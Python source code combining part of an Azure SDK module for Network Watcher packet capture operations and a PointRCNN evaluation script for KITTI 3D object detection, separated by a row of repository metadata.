cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('PacketCaptureResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.PacketCaptureResult"
"""Gets a packet capture session by name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PacketCaptureResult, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_04_01.models.PacketCaptureResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PacketCaptureResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified packet capture session.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def _stop_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self._stop_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_stop_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/stop'} # type: ignore
def begin_stop(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Stops a specified packet capture session.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._stop_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/stop'} # type: ignore
def _get_status_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.PacketCaptureQueryStatusResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureQueryStatusResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
# Construct URL
url = self._get_status_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PacketCaptureQueryStatusResult', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('PacketCaptureQueryStatusResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_status_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/queryStatus'} # type: ignore
def begin_get_status(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Query the status of a running packet capture session.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:param packet_capture_name: The name given to the packet capture session.
:type packet_capture_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either PacketCaptureQueryStatusResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_04_01.models.PacketCaptureQueryStatusResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureQueryStatusResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_status_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
packet_capture_name=packet_capture_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('PacketCaptureQueryStatusResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_status.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}/queryStatus'} # type: ignore
def list(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.PacketCaptureListResult"]
"""Lists all packet capture sessions within the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the Network Watcher resource.
:type network_watcher_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PacketCaptureListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_04_01.models.PacketCaptureListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
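        # Paging plumbing: ItemPaged drives the closures below -- get_next() executes
        # the first-page or next_link request, extract_data() unpacks one page of
        # PacketCaptureResult items, and prepare_request() builds the HTTP request.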
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('PacketCaptureListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures'} # type: ignore
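# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated file). It shows the typical
# long-running-operation flow when these operations are reached through
# NetworkManagementClient.packet_captures. The resource names, the capture name
# and the PacketCapture/PacketCaptureStorageLocation field values below are
# placeholder assumptions; running it requires valid Azure credentials and the
# azure-identity package.
def _example_packet_capture_flow(subscription_id, resource_group, watcher_name, vm_resource_id):
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.network import NetworkManagementClient
    client = NetworkManagementClient(DefaultAzureCredential(), subscription_id)
    # Create the capture session and block until the LRO finishes.
    capture = client.packet_captures.begin_create(
        resource_group, watcher_name, "example-capture",
        models.PacketCapture(
            target=vm_resource_id,
            storage_location=models.PacketCaptureStorageLocation(
                file_path="D:\\captures\\example-capture.cap"),
        ),
    ).result()
    # Query the running session, then stop and delete it.
    status = client.packet_captures.begin_get_status(
        resource_group, watcher_name, "example-capture").result()
    client.packet_captures.begin_stop(resource_group, watcher_name, "example-capture").wait()
    client.packet_captures.begin_delete(resource_group, watcher_name, "example-capture").wait()
    return capture, status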
| 49.712074 | 240 | 0.668307 |
ba844ebd09cc97060b1b27ccb2d8ea5471f82990 | 41,811 | py | Python | PointRCNNV1/tools/eval_rcnn.py | kangpl/semester_project_cvlab | fca8e47c619b03599e8f878aae3371a0060e45a7 | ["Artistic-1.0-cl8"] | 4 | 2021-03-14T17:41:21.000Z | 2021-11-04T07:16:39.000Z | PointRCNNV1/tools/eval_rcnn.py | kangpl/semester_project_cvlab | fca8e47c619b03599e8f878aae3371a0060e45a7 | ["Artistic-1.0-cl8"] | 1 | 2021-04-17T14:50:41.000Z | 2021-04-17T14:50:41.000Z | PointRCNNV1/tools/eval_rcnn.py | kangpl/semester_project_cvlab | fca8e47c619b03599e8f878aae3371a0060e45a7 | ["Artistic-1.0-cl8"] | 1 | 2021-02-01T09:25:49.000Z | 2021-02-01T09:25:49.000Z |
import _init_path
import os
import numpy as np
import torch
from torch.utils.data import DataLoader
import torch.nn.functional as F
from lib.net.point_rcnn import PointRCNN
from lib.datasets.kitti_rcnn_dataset import KittiRCNNDataset
import tools.train_utils.train_utils as train_utils
from lib.utils.bbox_transform import decode_bbox_target
from tools.kitti_object_eval_python.evaluate import evaluate as kitti_evaluate
from lib.config import cfg, cfg_from_file, save_config_to_file, cfg_from_list
import argparse
import lib.utils.kitti_utils as kitti_utils
import lib.utils.iou3d.iou3d_utils as iou3d_utils
from datetime import datetime
import logging
import re
import glob
import time
from tensorboardX import SummaryWriter
import tqdm
np.random.seed(1024) # set the same seed
parser = argparse.ArgumentParser(description="arg parser")
parser.add_argument('--cfg_file', type=str, default='cfgs/default.yml', help='specify the config for evaluation')
parser.add_argument("--eval_mode", type=str, default='rpn', required=True, help="specify the evaluation mode")
parser.add_argument('--eval_all', action='store_true', default=False, help='whether to evaluate all checkpoints')
parser.add_argument('--test', action='store_true', default=False, help='evaluate without ground truth')
parser.add_argument("--ckpt", type=str, default=None, help="specify a checkpoint to be evaluated")
parser.add_argument("--rpn_ckpt", type=str, default=None, help="specify the checkpoint of rpn if trained separated")
parser.add_argument("--rcnn_ckpt", type=str, default=None, help="specify the checkpoint of rcnn if trained separated")
parser.add_argument('--batch_size', type=int, default=1, help='batch size for evaluation')
parser.add_argument('--workers', type=int, default=4, help='number of workers for dataloader')
parser.add_argument("--extra_tag", type=str, default='default', help="extra tag for multiple evaluation")
parser.add_argument('--output_dir', type=str, default=None, help='specify an output directory if needed')
parser.add_argument("--ckpt_dir", type=str, default=None, help="specify a ckpt directory to be evaluated if needed")
parser.add_argument('--save_result', action='store_true', default=False, help='save evaluation results to files')
parser.add_argument('--save_rpn_feature', action='store_true', default=False,
                    help='save features for separate rcnn training and evaluation')
parser.add_argument('--random_select', action='store_true', default=True, help='sample to the same number of points')
parser.add_argument('--start_epoch', default=0, type=int, help='ignore the checkpoint smaller than this epoch')
parser.add_argument("--rcnn_eval_roi_dir", type=str, default=None,
help='specify the saved rois for rcnn evaluation when using rcnn_offline mode')
parser.add_argument("--rcnn_eval_feature_dir", type=str, default=None,
help='specify the saved features for rcnn evaluation when using rcnn_offline mode')
parser.add_argument('--set', dest='set_cfgs', default=None, nargs=argparse.REMAINDER,
help='set extra config keys if needed')
parser.add_argument("--rpn_bgr", type=str, default=None,
help='specify the saved bgr for rpn training')
parser.add_argument("--rpn_mean_covariance", type=str, default=None,
help='specify the saved mean covariance for rpn training')
args = parser.parse_args()
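# ---------------------------------------------------------------------------
# Hedged invocation examples (not taken from the project docs; the checkpoint
# paths and the exact set of accepted --eval_mode values are assumptions based
# on the flag names and help strings above):
#   python eval_rcnn.py --cfg_file cfgs/default.yml --eval_mode rpn \
#       --ckpt <path/to/checkpoint_epoch_XX.pth> --batch_size 4
#   python eval_rcnn.py --cfg_file cfgs/default.yml --eval_mode rcnn_offline \
#       --rcnn_ckpt <path/to/rcnn_ckpt.pth> --rcnn_eval_roi_dir <roi_dir> \
#       --rcnn_eval_feature_dir <feature_dir>
# ---------------------------------------------------------------------------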
def create_logger(log_file):
log_format = '%(asctime)s %(levelname)5s %(message)s'
logging.basicConfig(level=logging.INFO, format=log_format, filename=log_file)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter(log_format))
logging.getLogger(__name__).addHandler(console)
return logging.getLogger(__name__)
def save_kitti_format(sample_id, calib, bbox3d, kitti_output_dir, scores, img_shape):
corners3d = kitti_utils.boxes3d_to_corners3d(bbox3d)
img_boxes, _ = calib.corners3d_to_img_boxes(corners3d)
img_boxes[:, 0] = np.clip(img_boxes[:, 0], 0, img_shape[1] - 1)
img_boxes[:, 1] = np.clip(img_boxes[:, 1], 0, img_shape[0] - 1)
img_boxes[:, 2] = np.clip(img_boxes[:, 2], 0, img_shape[1] - 1)
img_boxes[:, 3] = np.clip(img_boxes[:, 3], 0, img_shape[0] - 1)
img_boxes_w = img_boxes[:, 2] - img_boxes[:, 0]
img_boxes_h = img_boxes[:, 3] - img_boxes[:, 1]
box_valid_mask = np.logical_and(img_boxes_w < img_shape[1] * 0.8, img_boxes_h < img_shape[0] * 0.8)
kitti_output_file = os.path.join(kitti_output_dir, '%06d.txt' % sample_id)
with open(kitti_output_file, 'w') as f:
for k in range(bbox3d.shape[0]):
if box_valid_mask[k] == 0:
continue
x, z, ry = bbox3d[k, 0], bbox3d[k, 2], bbox3d[k, 6]
beta = np.arctan2(z, x)
alpha = -np.sign(beta) * np.pi / 2 + beta + ry
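            # beta: azimuth of the box centre in the camera frame; alpha: the KITTI
            # observation angle, i.e. rotation_y compensated for the viewing direction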
print('%s -1 -1 %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f %.4f' %
(cfg.CLASSES, alpha, img_boxes[k, 0], img_boxes[k, 1], img_boxes[k, 2], img_boxes[k, 3],
bbox3d[k, 3], bbox3d[k, 4], bbox3d[k, 5], bbox3d[k, 0], bbox3d[k, 1], bbox3d[k, 2],
bbox3d[k, 6], scores[k]), file=f)
def save_rpn_features(seg_result, rpn_scores_raw, pts_features, backbone_xyz, backbone_features, kitti_features_dir,
sample_id):
pts_intensity = pts_features[:, 0]
output_file = os.path.join(kitti_features_dir, '%06d.npy' % sample_id)
xyz_file = os.path.join(kitti_features_dir, '%06d_xyz.npy' % sample_id)
seg_file = os.path.join(kitti_features_dir, '%06d_seg.npy' % sample_id)
intensity_file = os.path.join(kitti_features_dir, '%06d_intensity.npy' % sample_id)
np.save(output_file, backbone_features)
np.save(xyz_file, backbone_xyz)
np.save(seg_file, seg_result)
np.save(intensity_file, pts_intensity)
rpn_scores_raw_file = os.path.join(kitti_features_dir, '%06d_rawscore.npy' % sample_id)
np.save(rpn_scores_raw_file, rpn_scores_raw)
def eval_one_epoch_rpn(model, dataloader, epoch_id, result_dir, logger):
np.random.seed(1024)
mode = 'TEST' if args.test else 'EVAL'
if args.save_rpn_feature:
kitti_features_dir = os.path.join(result_dir, 'features')
os.makedirs(kitti_features_dir, exist_ok=True)
if args.save_result or args.save_rpn_feature:
kitti_output_dir = os.path.join(result_dir, 'detections', 'data')
seg_output_dir = os.path.join(result_dir, 'seg_result')
os.makedirs(kitti_output_dir, exist_ok=True)
os.makedirs(seg_output_dir, exist_ok=True)
logger.info('---- EPOCH %s RPN EVALUATION ----' % epoch_id)
model.eval()
thresh_list = [0.1, 0.3, 0.5, 0.7, 0.9]
total_recalled_bbox_list, total_gt_bbox = [0] * 5, 0
dataset = dataloader.dataset
cnt = max_num = rpn_iou_avg = 0
progress_bar = tqdm.tqdm(total=len(dataloader), leave=True, desc='eval')
for data in dataloader:
sample_id_list, pts_rect, pts_features, pts_input = \
data['sample_id'], data['pts_rect'], data['pts_features'], data['pts_input']
sample_id = sample_id_list[0]
cnt += len(sample_id_list)
if not args.test:
rpn_cls_label, rpn_reg_label = data['rpn_cls_label'], data['rpn_reg_label']
gt_boxes3d = data['gt_boxes3d']
rpn_cls_label = torch.from_numpy(rpn_cls_label).cuda(non_blocking=True).long()
if gt_boxes3d.shape[1] == 0: # (B, M, 7)
pass
# logger.info('%06d: No gt box' % sample_id)
else:
gt_boxes3d = torch.from_numpy(gt_boxes3d).cuda(non_blocking=True).float()
inputs = torch.from_numpy(pts_input).cuda(non_blocking=True).float()
input_data = {'pts_input': inputs}
# model inference
ret_dict = model(input_data)
rpn_cls, rpn_reg = ret_dict['rpn_cls'], ret_dict['rpn_reg']
backbone_xyz, backbone_features = ret_dict['backbone_xyz'], ret_dict['backbone_features']
rpn_scores_raw = rpn_cls[:, :, 0]
rpn_scores = torch.sigmoid(rpn_scores_raw)
seg_result = (rpn_scores > cfg.RPN.SCORE_THRESH).long()
# proposal layer
rois, roi_scores_raw = model.rpn.proposal_layer(rpn_scores_raw, rpn_reg, backbone_xyz) # (B, M, 7)
batch_size = rois.shape[0]
# calculate recall and save results to file
for bs_idx in range(batch_size):
cur_sample_id = sample_id_list[bs_idx]
cur_scores_raw = roi_scores_raw[bs_idx] # (N)
cur_boxes3d = rois[bs_idx] # (N, 7)
cur_seg_result = seg_result[bs_idx]
cur_pts_rect = pts_rect[bs_idx]
# calculate recall
if not args.test:
cur_rpn_cls_label = rpn_cls_label[bs_idx]
cur_gt_boxes3d = gt_boxes3d[bs_idx]
k = cur_gt_boxes3d.__len__() - 1
while k > 0 and cur_gt_boxes3d[k].sum() == 0:
k -= 1
cur_gt_boxes3d = cur_gt_boxes3d[:k + 1]
recalled_num = 0
if cur_gt_boxes3d.shape[0] > 0:
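                    # gt_max_iou[i] is the best IoU any proposal achieves with GT box i,
                    # so recall at each threshold counts GT boxes covered at least that well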
iou3d = iou3d_utils.boxes_iou3d_gpu(cur_boxes3d, cur_gt_boxes3d[:, 0:7])
gt_max_iou, _ = iou3d.max(dim=0)
for idx, thresh in enumerate(thresh_list):
total_recalled_bbox_list[idx] += (gt_max_iou > thresh).sum().item()
recalled_num = (gt_max_iou > 0.7).sum().item()
total_gt_bbox += cur_gt_boxes3d.__len__()
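                # point-wise segmentation IoU over foreground points
                # (predicted RPN segmentation vs. ground-truth labels)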
fg_mask = cur_rpn_cls_label > 0
correct = ((cur_seg_result == cur_rpn_cls_label) & fg_mask).sum().float()
union = fg_mask.sum().float() + (cur_seg_result > 0).sum().float() - correct
rpn_iou = correct / torch.clamp(union, min=1.0)
rpn_iou_avg += rpn_iou.item()
# save result
if args.save_rpn_feature:
# save features to file
save_rpn_features(seg_result[bs_idx].float().cpu().numpy(),
rpn_scores_raw[bs_idx].float().cpu().numpy(),
pts_features[bs_idx],
backbone_xyz[bs_idx].cpu().numpy(),
backbone_features[bs_idx].cpu().numpy().transpose(1, 0),
kitti_features_dir, cur_sample_id)
if args.save_result or args.save_rpn_feature:
cur_pred_cls = cur_seg_result.cpu().numpy()
output_file = os.path.join(seg_output_dir, '%06d.npy' % cur_sample_id)
if not args.test:
cur_gt_cls = cur_rpn_cls_label.cpu().numpy()
output_data = np.concatenate(
(cur_pts_rect.reshape(-1, 3), cur_gt_cls.reshape(-1, 1), cur_pred_cls.reshape(-1, 1)), axis=1)
else:
output_data = np.concatenate((cur_pts_rect.reshape(-1, 3), cur_pred_cls.reshape(-1, 1)), axis=1)
np.save(output_file, output_data.astype(np.float16))
# save as kitti format
calib = dataset.get_calib(cur_sample_id)
cur_boxes3d = cur_boxes3d.cpu().numpy()
image_shape = dataset.get_image_shape(cur_sample_id)
save_kitti_format(cur_sample_id, calib, cur_boxes3d, kitti_output_dir, cur_scores_raw, image_shape)
disp_dict = {'mode': mode, 'recall': '%d/%d' % (total_recalled_bbox_list[3], total_gt_bbox),
'rpn_iou': rpn_iou_avg / max(cnt, 1.0)}
progress_bar.set_postfix(disp_dict)
progress_bar.update()
progress_bar.close()
logger.info(str(datetime.now()))
logger.info('-------------------performance of epoch %s---------------------' % epoch_id)
logger.info('max number of objects: %d' % max_num)
